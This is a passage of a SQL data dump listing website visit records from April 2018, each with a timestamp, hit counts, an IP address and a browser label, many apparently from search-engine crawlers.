8.121','other'),(231706,1523193511,1,1,0,0,'54.36.148.235','other'),(231707,1523194039,1,1,0,0,'141.8.142.74','other'),(231708,1523194101,1,1,0,0,'54.36.148.28','other'),(231709,1523194317,1,1,0,0,'54.36.148.47','other'),(231710,1523194461,1,1,0,0,'54.36.149.5','other'),(231711,1523194612,1,1,0,0,'54.36.148.19','other'),(231712,1523194709,1,1,0,0,'54.36.148.169','other'),(231713,1523194851,1,1,0,0,'35.226.23.240','other'),(231714,1523194937,1,1,0,0,'54.36.149.83','other'),(231715,1523195151,1,1,0,0,'216.244.66.237','other'),(231716,1523195224,1,1,0,0,'54.36.148.159','other'),(231717,1523195388,1,1,0,0,'54.36.148.130','other'),(231718,1523195508,1,1,0,0,'141.8.142.74','other'),(231719,1523196127,1,1,0,0,'54.36.148.60','other'),(231720,1523196363,1,1,0,0,'54.36.148.23','other'),(231721,1523196839,1,1,0,0,'54.36.148.88','other'),(231722,1523197018,1,1,0,0,'54.36.148.58','other'),(231723,1523197049,1,1,0,0,'54.36.148.215','other'),(231724,1523197208,1,1,0,0,'54.36.148.108','other'),(231725,1523197374,1,1,0,0,'54.36.148.49','other'),(231726,1523197429,1,1,0,0,'217.69.136.207','other'),(231727,1523197636,1,1,0,0,'54.36.148.118','other'),(231728,1523197894,1,1,0,0,'54.36.148.123','other'),(231729,1523198201,1,1,0,0,'54.36.148.124','other'),(231730,1523198375,1,1,0,0,'54.36.149.48','other'),(231731,1523198448,1,1,0,0,'54.36.148.11','other'),(231732,1523198463,1,1,0,0,'54.36.149.21','other'),(231733,1523198542,2,2,0,0,'216.244.66.237','other'),(231734,1523198725,1,1,0,0,'141.8.142.74','other'),(231735,1523198804,1,1,0,0,'54.36.148.215','other'),(231736,1523198940,1,1,0,0,'54.36.148.55','other'),(231737,1523199460,1,1,0,0,'54.36.148.89','other'),(231738,1523199660,3,3,0,0,'141.8.142.74','other'),(231739,1523199710,1,1,0,0,'54.36.148.87','other'),(231740,1523199714,1,1,0,0,'54.36.148.67','other'),(231741,1523199846,1,0,1,0,'66.249.64.153',''),(231742,1523199953,1,1,0,0,'216.244.66.237','other'),(231743,1523200399,1,1,0,0,'180.76.15.135','other'),(231744,1523200564,1,1,0,0,'141.8.142.74','other'),(231745,1523200719,1,1,0,0,'54.36.149.5','other'),(231746,1523200740,1,1,0,0,'54.36.149.7','other'),(231747,1523201050,1,1,0,0,'54.36.149.60','other'),(231748,1523201163,1,1,0,0,'54.36.148.113','other'),(231749,1523201379,1,1,0,0,'54.36.148.165','other'),(231750,1523201390,1,1,0,0,'54.36.148.192','other'),(231751,1523201459,1,1,0,0,'54.36.148.56','other'),(231752,1523201499,1,1,0,0,'178.154.171.88','other'),(231753,1523201511,1,1,0,0,'54.36.148.75','other'),(231754,1523201515,1,1,0,0,'141.8.142.74','other'),(231755,1523201832,1,1,0,0,'54.36.148.208','other'),(231756,1523201844,1,1,0,0,'54.36.148.239','other'),(231757,1523201997,1,1,0,0,'8.29.198.25','other'),(231758,1523202093,1,1,0,0,'54.36.148.99','other'),(231759,1523202297,1,1,0,0,'54.36.149.7','other'),(231760,1523202430,1,1,0,0,'157.55.39.86','other'),(231761,1523202470,1,1,0,0,'54.36.149.13','other'),(231762,1523202786,1,1,0,0,'54.36.149.86','other'),(231763,1523202795,1,1,0,0,'54.36.148.212','other'),(231764,1523202822,1,1,0,0,'178.154.171.88','other'),(231765,1523203508,1,1,0,0,'54.36.148.120','other'),(231766,1523203967,1,1,0,0,'54.36.149.5','other'),(231767,1523204218,1,1,0,0,'54.36.149.1','other'),(231768,1523204506,1,1,0,0,'54.36.148.154','other'),(231769,1523204540,1,1,0,0,'185.102.184.97','other'),(231770,1523204951,1,1,0,0,'54.36.148.70','other'),(231771,1523205132,1,1,0,0,'178.154.171.88','other'),(231772,1523205398,1,1,0,0,'54.36.148.56','other'),(231773,1523205555,1,1,0,0,'54.36.149.83','other'),(231774,1523205649,1,1,0,0,'141.8.142.74','other'),(231775,1523205781,1,1,0,0,'216.244.66.237','other'),(231776,1523205936,1,1,0,0,'54.36.149.75','other'),(231777,1523206070,1,1,0,0,'54.36.149.53','other'),(231778,1523206120,1,1,0,0,'54.36.149.71','other'),(231779,1523206366,1,1,0,0,'54.36.148.154','other'),(231780,1523206468,1,1,0,0,'54.36.148.255','other'),(231781,1523206536,1,1,0,0,'220.181.132.191','chrome'),(231782,1523206565,1,1,0,0,'106.120.162.111','chrome'),(231783,1523207557,1,1,0,0,'54.36.148.53','other'),(231784,1523208109,1,1,0,0,'54.36.148.146','other'),(231785,1523208536,1,1,0,0,'54.36.148.177','other'),(231786,1523208572,1,1,0,0,'54.36.148.29','other'),(231787,1523208626,1,1,0,0,'54.36.149.48','other'),(231788,1523209046,2,2,0,0,'37.54.17.157','chrome'),(231789,1523209316,1,1,0,0,'54.36.149.42','other'),(231790,1523209650,1,1,0,0,'54.36.148.167','other'),(231791,1523209716,1,1,0,0,'54.36.149.10','other'),(231792,1523209758,1,1,0,0,'54.36.148.204','other'),(231793,1523209870,1,1,0,0,'54.36.148.68','other'),(231794,1523209903,1,1,0,0,'54.36.149.98','other'),(231795,1523209969,1,1,0,0,'54.36.148.241','other'),(231796,1523210196,1,1,0,0,'216.244.66.237','other'),(231797,1523210345,1,1,0,0,'54.36.148.165','other'),(231798,1523210409,1,1,0,0,'54.36.148.170','other'),(231799,1523210510,1,1,0,0,'54.36.148.238','other'),(231800,1523210553,1,1,0,0,'54.36.148.132','other'),(231801,1523210688,1,1,0,0,'217.69.133.29','other'),(231802,1523210721,1,1,0,0,'54.36.148.131','other'),(231803,1523210742,1,1,0,0,'54.36.148.60','other'),(231804,1523210784,1,0,1,0,'66.249.64.28',''),(231805,1523210926,1,1,0,0,'157.55.39.91','other'),(231806,1523211189,1,1,0,0,'216.244.66.237','other'),(231807,1523211242,1,1,0,0,'141.8.142.74','other'),(231808,1523211249,1,1,0,0,'54.36.148.24','other'),(231809,1523211442,1,1,0,0,'54.36.148.253','other'),(231810,1523211655,1,1,0,0,'54.36.149.48','other'),(231811,1523211752,1,1,0,0,'54.36.148.196','other'),(231812,1523211859,1,1,0,0,'54.36.148.132','other'),(231813,1523211916,1,1,0,0,'54.36.148.224','other'),(231814,1523211930,1,1,0,0,'54.36.148.159','other'),(231815,1523212307,1,1,0,0,'54.36.148.161','other'),(231816,1523212347,1,1,0,0,'54.36.148.113','other'),(231817,1523212695,1,1,0,0,'54.36.148.197','other'),(231818,1523212862,1,1,0,0,'8.29.198.25','other'),(231819,1523213152,1,1,0,0,'54.36.148.119','other'),(231820,1523213262,1,1,0,0,'54.36.149.98','other'),(231821,1523213335,1,1,0,0,'54.36.148.250','other'),(231822,1523213657,1,1,0,0,'54.165.59.7','other'),(231823,1523213865,1,1,0,0,'54.36.148.254','other'),(231824,1523213872,1,1,0,0,'54.36.148.64','other'),(231825,1523214167,1,1,0,0,'54.36.149.24','other'),(231826,1523214340,1,1,0,0,'54.36.148.224','other'),(231827,1523214450,1,0,1,0,'66.249.64.153',''),(231828,1523214459,1,1,0,0,'54.36.148.158','other'),(231829,1523214659,1,1,0,0,'77.111.244.64','chrome'),(231830,1523214723,1,1,0,0,'54.36.148.154','other'),(231831,1523214794,1,1,0,0,'54.36.149.41','other'),(231832,1523214909,1,1,0,0,'54.36.148.216','other'),(231833,1523214987,1,1,0,0,'54.36.148.221','other'),(231834,1523215004,1,1,0,0,'178.154.171.88','other'),(231835,1523215637,1,1,0,0,'77.111.244.23','chrome'),(231836,1523215711,1,1,0,0,'54.36.149.56','other'),(231837,1523215744,1,1,0,0,'54.36.148.87','other'),(231838,1523215819,1,1,0,0,'54.36.149.54','other'),(231839,1523215940,1,1,0,0,'54.36.148.16','other'),(231840,1523216084,1,1,0,0,'188.255.22.40','msie'),(231841,1523216122,1,1,0,0,'54.36.148.45','other'),(231842,1523216150,1,1,0,0,'180.76.15.139','other'),(231843,1523216182,1,1,0,0,'35.196.46.35','firefox'),(231844,1523216194,1,1,0,0,'77.111.244.66','chrome'),(231845,1523216403,1,1,0,0,'216.244.66.237','other'),(231846,1523216573,1,1,0,0,'94.180.193.66','msie'),(231847,1523216601,1,1,0,0,'54.36.148.61','other'),(231848,1523216612,1,1,0,0,'217.69.133.69','other'),(231849,1523216633,2,2,0,0,'141.8.142.74','other'),(231850,1523216837,1,1,0,0,'54.36.148.150','other'),(231851,1523217212,1,1,0,0,'54.36.148.164','other'),(231852,1523217552,1,1,0,0,'54.36.148.109','other'),(231853,1523217571,1,1,0,0,'54.36.149.53','other'),(231854,1523217660,1,1,0,0,'54.36.148.213','other'),(231855,1523217836,20,20,0,0,'54.37.149.75','other'),(231856,1523217851,1,1,0,0,'54.36.148.201','other'),(231857,1523218305,1,1,0,0,'54.36.148.26','other'),(231858,1523218472,1,1,0,0,'54.36.148.174','other'),(231859,1523218589,1,1,0,0,'54.36.149.38','other'),(231860,1523218646,1,1,0,0,'54.36.149.78','other'),(231861,1523218664,1,1,0,0,'54.36.149.86','other'),(231862,1523218710,1,1,0,0,'54.36.148.225','other'),(231863,1523218786,1,1,0,0,'54.36.148.253','other'),(231864,1523218869,1,1,0,0,'54.36.149.37','other'),(231865,1523218917,1,1,0,0,'54.36.148.51','other'),(231866,1523219040,1,1,0,0,'66.249.64.30','chrome'),(231867,1523219320,2,2,0,0,'141.8.142.74','other'),(231868,1523219330,1,1,0,0,'54.36.148.182','other'),(231869,1523219399,1,1,0,0,'54.36.149.80','other'),(231870,1523220277,1,1,0,0,'54.36.149.6','other'),(231871,1523220355,1,1,0,0,'54.36.148.164','other'),(231872,1523220497,1,1,0,0,'54.36.148.55','other'),(231873,1523220609,1,1,0,0,'54.36.149.20','other'),(231874,1523220644,1,1,0,0,'54.36.149.78','other'),(231875,1523220713,1,1,0,0,'54.36.148.127','other'),(231876,1523220962,1,1,0,0,'54.36.149.31','other'),(231877,1523221153,1,1,0,0,'54.36.149.54','other'),(231878,1523221160,1,1,0,0,'54.36.148.53','other'),(231879,1523221224,1,1,0,0,'54.36.148.246','other'),(231880,1523221242,1,1,0,0,'54.36.148.121','other'),(231881,1523222199,1,1,0,0,'54.36.148.137','other'),(231882,1523222200,1,1,0,0,'54.36.149.20','other'),(231883,1523222245,1,1,0,0,'54.36.148.120','other'),(231884,1523222459,1,1,0,0,'54.36.149.95','other'),(231885,1523222645,1,1,0,0,'54.36.148.168','other'),(231886,1523223546,1,1,0,0,'54.36.148.227','other'),(231887,1523223548,1,1,0,0,'141.8.142.74','other'),(231888,1523223666,1,1,0,0,'54.36.149.58','other'),(231889,1523223712,1,1,0,0,'8.29.198.25','other'),(231890,1523223719,1,1,0,0,'54.36.148.165','other'),(231891,1523223845,1,1,0,0,'54.36.149.68','other'),(231892,1523224428,1,0,1,0,'66.249.66.199',''),(231893,1523224433,1,1,0,0,'54.36.148.78','other'),(231894,1523224491,1,1,0,0,'217.69.136.207','other'),(231895,1523224614,1,1,0,0,'66.249.66.157','chrome'),(231896,1523224809,1,1,0,0,'54.36.148.86','other'),(231897,1523225008,1,1,0,0,'180.76.15.155','other'),(231898,1523225022,1,1,0,0,'141.8.142.74','other'),(231899,1523225026,1,1,0,0,'66.249.66.201','chrome'),(231900,1523225032,1,1,0,0,'54.36.148.170','other'),(231901,1523225193,1,1,0,0,'54.36.149.101','other'),(231902,1523225367,1,1,0,0,'54.36.148.69','other'),(231903,1523225627,1,1,0,0,'54.36.148.167','other'),(231904,1523225816,1,1,0,0,'54.36.148.47','other'),(231905,1523225879,1,1,0,0,'54.36.148.64','other'),(231906,1523225968,1,1,0,0,'54.36.149.49','other'),(231907,1523226291,1,1,0,0,'54.36.148.239','other'),(231908,1523226675,1,1,0,0,'54.36.149.10','other'),(231909,1523226710,1,1,0,0,'54.36.148.12','other'),(231910,1523226762,1,1,0,0,'217.69.133.192','other'),(231911,1523226908,1,1,0,0,'54.36.148.241','other'),(231912,1523226983,1,1,0,0,'54.36.149.81','other'),(231913,1523226999,1,1,0,0,'54.36.149.53','other'),(231914,1523227087,2,2,0,0,'157.55.39.90','other'),(231915,1523227298,1,1,0,0,'54.36.149.101','other'),(231916,1523227387,1,1,0,0,'54.36.148.247','other'),(231917,1523227450,1,1,0,0,'54.36.148.121','other'),(231918,1523227485,1,1,0,0,'54.36.148.80','other'),(231919,1523227814,1,1,0,0,'54.36.148.168','other'),(231920,1523227874,1,1,0,0,'91.196.178.102','chrome'),(231921,1523227965,1,1,0,0,'54.36.148.222','other'),(231922,1523228143,2,2,0,0,'141.8.142.74','other'),(231923,1523228144,1,1,0,0,'54.36.148.226','other'),(231924,1523228279,1,1,0,0,'54.36.148.153','other'),(231925,1523228295,1,1,0,0,'178.154.171.88','other'),(231926,1523228606,1,1,0,0,'54.36.149.50','other'),(231927,1523228630,1,1,0,0,'54.36.149.65','other'),(231928,1523228670,1,1,0,0,'54.36.148.253','other'),(231929,1523228791,1,1,0,0,'149.56.142.185','other'),(231930,1523228864,1,1,0,0,'54.36.149.82','other'),(231931,1523229235,1,1,0,0,'54.36.148.95','other'),(231932,1523229288,1,1,0,0,'54.36.149.5','other'),(231933,1523229320,1,1,0,0,'54.36.148.235','other'),(231934,1523229377,1,1,0,0,'54.36.148.109','other'),(231935,1523229449,1,1,0,0,'54.36.148.178','other'),(231936,1523229454,1,1,0,0,'54.36.148.240','other'),(231937,1523229551,1,1,0,0,'35.226.23.240','other'),(231938,1523229593,1,1,0,0,'54.36.148.153','other'),(231939,1523229639,1,1,0,0,'54.36.149.43','other'),(231940,1523229776,1,1,0,0,'54.36.148.196','other'),(231941,1523230158,1,1,0,0,'54.36.149.39','other'),(231942,1523230281,1,1,0,0,'54.36.149.106','other'),(231943,1523230424,2,2,0,0,'216.244.66.237','other'),(231944,1523230630,1,1,0,0,'54.36.148.41','other'),(231945,1523230871,1,1,0,0,'54.36.148.100','other'),(231946,1523231063,3,3,0,0,'141.8.142.74','other'),(231947,1523231154,1,1,0,0,'54.36.148.232','other'),(231948,1523231595,1,1,0,0,'54.36.148.98','other'),(231949,1523231713,1,1,0,0,'54.36.149.74','other'),(231950,1523231822,1,1,0,0,'54.36.149.48','other'),(231951,1523231907,1,1,0,0,'54.36.149.17','other'),(231952,1523231933,1,1,0,0,'54.36.148.197','other'),(231953,1523232367,2,2,0,0,'54.36.148.72','other'),(231954,1523232772,1,1,0,0,'54.36.148.115','other'),(231955,1523232905,2,2,0,0,'54.36.148.67','other'),(231956,1523233127,1,1,0,0,'54.36.148.142','other'),(231957,1523233245,1,0,1,0,'66.249.66.195',''),(231958,1523233548,2,2,0,0,'141.8.142.74','other'),(231959,1523233766,1,1,0,0,'54.36.149.2','other'),(231960,1523234018,1,1,0,0,'54.36.149.22','other'),(231961,1523234021,1,1,0,0,'54.36.149.18','other'),(231962,1523234030,1,1,0,0,'54.36.148.125','other'),(231963,1523234159,1,1,0,0,'216.244.66.237','other'),(231964,1523234299,1,1,0,0,'54.36.149.46','other'),(231965,1523234437,1,1,0,0,'54.36.148.85','other'),(231966,1523234558,1,1,0,0,'8.29.198.26','other'),(231967,1523235593,1,1,0,0,'54.36.148.179','other'),(231968,1523235633,1,1,0,0,'141.8.142.167','other'),(231969,1523235937,1,1,0,0,'216.244.66.237','other'),(231970,1523235992,1,1,0,0,'54.36.148.246','other'),(231971,1523236133,1,1,0,0,'54.36.148.158','other'),(231972,1523236274,1,1,0,0,'54.36.149.36','other'),(231973,1523236393,1,1,0,0,'54.36.148.252','other'),(231974,1523236407,1,1,0,0,'54.36.149.73','other'),(231975,1523236633,1,1,0,0,'54.36.148.150','other'),(231976,1523236667,1,1,0,0,'54.36.149.18','other'),(231977,1523236757,1,1,0,0,'54.36.149.99','other'),(231978,1523236863,1,1,0,0,'54.36.148.41','other'),(231979,1523236940,1,1,0,0,'54.36.148.45','other'),(231980,1523236952,1,0,1,0,'66.249.66.201',''),(231981,1523236987,1,1,0,0,'54.36.148.169','other'),(231982,1523237021,1,1,0,0,'54.36.148.17','other'),(231983,1523237084,1,1,0,0,'217.69.133.31','other'),(231984,1523237089,1,1,0,0,'54.36.149.4','other'),(231985,1523237143,1,1,0,0,'54.36.149.100','other'),(231986,1523237245,1,1,0,0,'54.36.148.229','other'),(231987,1523237876,1,1,0,0,'54.36.149.78','other'),(231988,1523238087,1,1,0,0,'54.36.148.212','other'),(231989,1523238148,1,1,0,0,'54.36.148.221','other'),(231990,1523238514,1,1,0,0,'54.36.148.109','other'),(231991,1523238652,1,1,0,0,'54.36.148.100','other'),(231992,1523238847,1,1,0,0,'141.8.142.74','other'),(231993,1523238899,1,1,0,0,'54.36.148.233','other'),(231994,1523239201,1,1,0,0,'54.36.148.243','other'),(231995,1523239311,1,1,0,0,'54.36.148.154','other'),(231996,1523239805,1,1,0,0,'54.36.148.84','other'),(231997,1523239854,1,0,1,0,'66.249.66.199',''),(231998,1523240125,1,1,0,0,'54.36.148.150','other'),(231999,1523240280,1,1,0,0,'54.36.148.238','other'),(232000,1523240330,1,1,0,0,'54.36.148.55','other'),(232001,1523240744,1,1,0,0,'54.36.149.3','other'),(232002,1523241089,1,1,0,0,'54.36.148.212','other'),(232003,1523241388,1,0,1,0,'66.249.66.201',''),(232004,1523241504,1,1,0,0,'5.189.191.207','other'),(232005,1523241629,1,1,0,0,'54.36.148.201','other'),(232006,1523241667,1,1,0,0,'54.36.148.91','other'),(232007,1523241916,1,1,0,0,'54.36.148.109','other'),(232008,1523242053,1,1,0,0,'54.36.149.78','other'),(232009,1523242099,1,1,0,0,'54.36.149.44','other'),(232010,1523242342,1,1,0,0,'54.36.148.106','other'),(232011,1523242348,1,1,0,0,'54.36.149.25','other'),(232012,1523242379,1,1,0,0,'54.36.148.176','other'),(232013,1523242407,1,1,0,0,'157.55.39.86','other'),(232014,1523242806,1,1,0,0,'54.36.148.56','other'),(232015,1523242815,1,1,0,0,'54.36.148.149','other'),(232016,1523242822,1,1,0,0,'217.69.133.29','other'),(232017,1523243131,1,1,0,0,'54.36.148.58','other'),(232018,1523243586,1,1,0,0,'217.69.133.232','other'),(232019,1523243609,1,1,0,0,'141.8.142.74','other'),(232020,1523243659,1,1,0,0,'54.36.149.107','other'),(232021,1523243800,1,1,0,0,'54.36.148.168','other'),(232022,1523243811,1,1,0,0,'54.36.148.25','other'),(232023,1523244385,1,0,1,0,'66.249.66.201',''),(232024,1523244516,1,1,0,0,'54.36.149.60','other'),(232025,1523244609,1,1,0,0,'54.36.148.16','other'),(232026,1523245399,1,1,0,0,'8.29.198.26','other'),(232027,1523245600,1,1,0,0,'54.36.148.181','other'),(232028,1523245631,1,1,0,0,'141.8.142.74','other'),(232029,1523246145,2,2,0,0,'37.54.17.157','chrome'),(232030,1523246220,1,1,0,0,'54.36.149.95','other'),(232031,1523246381,1,1,0,0,'54.36.148.209','other'),(232032,1523246879,2,2,0,0,'216.244.66.237','other'),(232033,1523246908,1,1,0,0,'54.36.148.146','other'),(232034,1523246981,1,1,0,0,'54.36.148.48','other'),(232035,1523246998,1,1,0,0,'54.36.148.47','other'),(232036,1523247087,1,1,0,0,'217.69.133.60','other'),(232037,1523247228,1,1,0,0,'54.36.148.98','other'),(232038,1523247252,1,1,0,0,'54.36.148.131','other'),(232039,1523247254,1,1,0,0,'54.36.148.132','other'),(232040,1523247321,1,1,0,0,'54.36.148.177','other'),(232041,1523247605,1,1,0,0,'217.69.133.193','other'),(232042,1523247704,1,1,0,0,'54.36.149.103','other'),(232043,1523247883,1,1,0,0,'54.36.148.105','other'),(232044,1523247963,1,1,0,0,'54.36.148.47','other'),(232045,1523248001,1,1,0,0,'54.36.148.72','other'),(232046,1523248238,1,1,0,0,'54.36.148.92','other'),(232047,1523248310,1,1,0,0,'54.36.149.98','other'),(232048,1523248360,1,1,0,0,'54.36.149.96','other'),(232049,1523248472,1,1,0,0,'54.36.148.136','other'),(232050,1523248491,1,1,0,0,'54.36.148.143','other'),(232051,1523248809,1,1,0,0,'54.36.148.194','other'),(232052,1523248836,1,1,0,0,'54.36.148.199','other'),(232053,1523249670,1,1,0,0,'54.36.148.16','other'),(232054,1523249782,1,1,0,0,'216.244.66.237','other'),(232055,1523249915,1,1,0,0,'54.36.149.46','other'),(232056,1523250298,1,1,0,0,'178.154.200.41','other'),(232057,1523250306,1,1,0,0,'141.8.142.74','other'),(232058,1523250510,1,1,0,0,'54.36.148.188','other'),(232059,1523250518,1,1,0,0,'54.36.148.47','other'),(232060,1523250714,1,1,0,0,'54.36.148.99','other'),(232061,1523250752,1,1,0,0,'54.36.149.43','other'),(232062,1523251249,2,2,0,0,'141.8.142.74','other'),(232063,1523251395,1,1,0,0,'54.36.148.77','other'),(232064,1523251461,1,1,0,0,'54.36.148.145','other'),(232065,1523251561,1,1,0,0,'54.36.148.42','other'),(232066,1523251761,1,1,0,0,'54.36.149.85','other'),(232067,1523251857,1,1,0,0,'54.36.148.25','other'),(232068,1523251894,1,1,0,0,'91.196.178.59','chrome'),(232069,1523252228,1,1,0,0,'54.36.148.95','other'),(232070,1523252502,1,1,0,0,'87.250.224.46','other'),(232071,1523253370,1,1,0,0,'5.228.95.140','chrome'),(232072,1523253709,1,1,0,0,'91.196.178.168','chrome'),(232073,1523256239,1,1,0,0,'8.29.198.26','other'),(232074,1523256425,1,1,0,0,'54.36.149.64','other'),(232075,1523256432,1,1,0,0,'54.36.148.167','other'),(232076,1523256570,1,1,0,0,'54.36.148.109','other'),(232077,1523256726,1,1,0,0,'54.36.148.218','other'),(232078,1523257100,1,1,0,0,'54.36.148.29','other'),(232079,1523257180,1,1,0,0,'217.69.133.227','other'),(232080,1523257204,1,1,0,0,'54.36.148.254','other'),(232081,1523257249,1,1,0,0,'54.36.148.97','other'),(232082,1523257283,1,0,1,0,'66.249.66.199',''),(232083,1523257322,1,1,0,0,'54.36.149.80','other'),(232084,1523257451,1,1,0,0,'54.36.148.20','other'),(232085,1523257466,1,1,0,0,'54.36.149.105','other'),(232086,1523257612,1,1,0,0,'54.36.148.77','other'),(232087,1523257724,1,1,0,0,'54.36.148.217','other'),(232088,1523257730,1,1,0,0,'54.36.148.22','other'),(232089,1523257821,1,1,0,0,'54.36.148.117','other'),(232090,1523257867,1,1,0,0,'54.36.148.53','other'),(232091,1523258053,1,1,0,0,'178.255.215.94','other'),(232092,1523258235,1,1,0,0,'54.36.148.230','other'),(232093,1523258446,1,1,0,0,'54.36.148.134','other'),(232094,1523258601,1,1,0,0,'54.36.148.178','other'),(232095,1523258617,1,1,0,0,'54.36.149.97','other'),(232096,1523259084,1,1,0,0,'157.55.39.86','other'),(232097,1523259176,1,1,0,0,'217.69.133.253','other'),(232098,1523259728,1,1,0,0,'35.196.46.35','other'),(232099,1523260044,2,2,0,0,'91.196.178.72','chrome'),(232100,1523260229,1,1,0,0,'157.55.39.86','other'),(232101,1523260467,2,2,0,0,'216.244.66.237','other'),(232102,1523261186,1,1,0,0,'217.69.133.230','other'),(232103,1523261301,2,2,0,0,'91.196.178.161','chrome'),(232104,1523262143,1,1,0,0,'141.8.142.74','other'),(232105,1523262291,1,0,1,0,'66.249.66.201',''),(232106,1523262394,1,1,0,0,'91.209.11.236','other'),(232107,1523264832,1,0,1,0,'66.249.66.201',''),(232108,1523265621,1,1,0,0,'141.8.142.74','other'),(232109,1523265681,1,1,0,0,'216.244.66.237','other'),(232110,1523265884,1,1,0,0,'91.209.11.236','other'),(232111,1523267082,1,1,0,0,'8.29.198.25','other'),(232112,1523267349,1,0,1,0,'66.249.66.199',''),(232113,1523268353,1,1,0,0,'217.69.136.207','other'),(232114,1523268956,1,0,1,0,'66.249.66.201',''),(232115,1523268968,1,0,1,0,'66.249.66.199',''),(232116,1523268972,4,0,4,0,'66.249.66.195',''),(232117,1523269042,1,1,0,0,'66.249.66.201','chrome'),(232118,1523269145,1,1,0,0,'178.154.171.88','other'),(232119,1523269506,2,2,0,0,'37.54.17.157','chrome'),(232120,1523269627,1,1,0,0,'216.244.66.237','other'),(232121,1523269840,1,1,0,0,'35.226.23.240','other'),(232122,1523270092,1,1,0,0,'66.249.66.199','chrome'),(232123,1523271324,3,1,2,0,'66.249.66.201',''),(232124,1523271978,1,1,0,0,'91.124.238.161','chrome'),(232125,1523272179,2,2,0,0,'141.8.142.74','other'),(232126,1523272724,1,1,0,0,'37.52.23.79','firefox'),(232127,1523273023,1,0,1,0,'66.249.66.195',''),(232128,1523273638,1,1,0,0,'178.154.171.88','other'),(232129,1523274109,1,1,0,0,'157.55.39.86','other'),(232130,1523275060,1,1,0,0,'87.250.224.46','other'),(232131,1523275724,54,54,0,0,'208.110.93.52','other'),(232132,1523275730,1,1,0,0,'178.154.171.88','other'),(232133,1523275891,1,1,0,0,'217.69.133.84','other'),(232134,1523276197,1,0,1,0,'66.249.66.199',''),(232135,1523276702,1,0,1,0,'66.249.66.201',''),(232136,1523276928,1,1,0,0,'217.69.133.28','other'),(232137,1523277259,1,0,1,0,'66.249.66.199',''),(232138,1523277969,1,1,0,0,'8.29.198.26','other'),(232139,1523278287,1,1,0,0,'141.8.142.74','other'),(232140,1523279147,1,1,0,0,'157.55.39.91','other'),(232141,1523279347,2,2,0,0,'95.132.55.123','chrome'),(232142,1523279634,2,2,0,0,'91.196.178.23','chrome'),(232143,1523280199,1,0,1,0,'66.249.66.195',''),(232144,1523280219,3,3,0,0,'62.210.101.96','other'),(232145,1523280408,1,1,0,0,'141.8.142.74','other'),(232146,1523280548,1,0,1,0,'66.249.66.158',''),(232147,1523280753,1,0,1,0,'66.249.66.199',''),(232148,1523281409,1,1,0,0,'217.69.133.85','other'),(232149,1523281860,1,1,0,0,'180.76.15.154','other'),(232150,1523282015,3,3,0,0,'178.154.171.88','other'),(232151,1523282063,2,2,0,0,'141.8.142.74','other'),(232152,1523282340,1,1,0,0,'217.69.133.85','other'),(232153,1523283167,1,1,0,0,'35.226.23.240','other'),(232154,1523283758,1,1,0,0,'141.8.142.74','other'),(232155,1523283800,1,1,0,0,'66.249.66.195','chrome'),(232156,1523284714,2,0,2,0,'66.249.66.199',''),(232157,1523284993,1,1,0,0,'178.154.171.88','other'),(232158,1523286435,1,1,0,0,'178.154.171.88','other'),(232159,1523287199,1,0,1,0,'66.249.66.156',''),(232160,1523287850,1,1,0,0,'178.95.245.104','chrome'),(232161,1523288116,2,2,0,0,'141.8.142.74','other'),(232162,1523288196,1,1,0,0,'188.163.18.30','chrome'),(232163,1523288520,1,1,0,0,'35.226.23.240','other'),(232164,1523288759,1,1,0,0,'5.45.207.58','other'),(232165,1523288832,1,1,0,0,'8.29.198.25','other'),(232166,1523289829,1,1,0,0,'91.196.178.89','chrome'),(232167,1523291535,1,1,0,0,'178.154.171.88','other'),(232168,1523291674,1,1,0,0,'180.76.15.29','other'),(232169,1523291859,1,1,0,0,'141.8.142.74','other'),(232170,1523291943,1,0,1,0,'66.249.66.201',''),(232171,1523292574,1,0,1,0,'66.249.66.195',''),(232172,1523293244,2,2,0,0,'216.244.66.237','other'),(232173,1523293392,1,0,1,0,'66.249.66.157',''),(232174,1523293815,1,1,0,0,'141.8.142.74','other'),(232175,1523294288,2,2,0,0,'216.244.66.237','other'),(232176,1523295209,1,1,0,0,'217.69.133.10','other'),(232177,1523295360,1,0,1,0,'66.249.66.156',''),(232178,1523296306,1,1,0,0,'217.69.133.60','other'),(232179,1523296505,1,1,0,0,'46.211.6.116','chrome'),(232180,1523296622,1,1,0,0,'141.8.142.74','other'),(232181,1523297225,1,1,0,0,'178.154.171.88','other'),(232182,1523298667,1,0,1,0,'66.249.66.195',''),(232183,1523298825,1,1,0,0,'216.244.66.237','other'),(232184,1523298939,1,0,1,0,'66.249.66.201',''),(232185,1523299154,1,1,0,0,'37.53.18.207','chrome'),(232186,1523299371,1,1,0,0,'178.154.171.88','other'),(232187,1523299702,1,1,0,0,'8.29.198.26','other'),(232188,1523300218,1,1,0,0,'87.250.224.46','other'),(232189,1523300583,3,3,0,0,'195.154.146.17','other'),(232190,1523301044,1,0,1,0,'66.249.66.158',''),(232191,1523301596,1,1,0,0,'217.69.133.231','other'),(232192,1523301644,1,1,0,0,'141.8.132.19','other'),(232193,1523302249,1,1,0,0,'92.112.230.181','chrome'),(232194,1523304264,1,1,0,0,'144.217.80.115','other'),(232195,1523304692,1,1,0,0,'141.8.142.74','other'),(232196,1523304968,3,3,0,0,'178.154.171.88','other'),(232197,1523305229,1,1,0,0,'216.244.66.237','other'),(232198,1523305589,1,1,0,0,'217.69.133.230','other'),(232199,1523305735,1,1,0,0,'141.8.142.74','other'),(232200,1523306813,1,1,0,0,'178.154.171.88','other'),(232201,1523306872,3,3,0,0,'46.4.71.176','other'),(232202,1523307178,1,1,0,0,'109.87.64.210','chrome'),(232203,1523307379,1,1,0,0,'141.8.142.74','other'),(232204,1523307557,1,0,1,0,'66.249.66.199',''),(232205,1523307894,2,2,0,0,'178.154.171.88','other'),(232206,1523308121,2,2,0,0,'91.209.11.236','other'),(232207,1523308142,1,1,0,0,'5.45.207.58','other'),(232208,1523308413,1,0,1,0,'66.249.66.157',''),(232209,1523308645,3,3,0,0,'141.8.142.74','other'),(232210,1523309585,1,1,0,0,'40.77.167.107','other'),(232211,1523309708,1,1,0,0,'178.154.171.88','other'),(232212,1523309713,1,1,0,0,'141.8.142.74','other'),(232213,1523310560,1,1,0,0,'8.29.198.27','other'),(232214,1523310832,1,0,1,0,'66.249.66.157',''),(232215,1523311769,1,1,0,0,'46.161.9.31','firefox'),(232216,1523312664,1,1,0,0,'35.226.23.240','other'),(232217,1523313563,2,2,0,0,'141.8.142.74','other'),(232218,1523313968,1,1,0,0,'217.69.133.235','other'),(232219,1523315169,1,1,0,0,'217.69.136.207','other'),(232220,1523316530,1,1,0,0,'141.8.142.74','other'),(232221,1523317200,1,1,0,0,'217.69.133.215','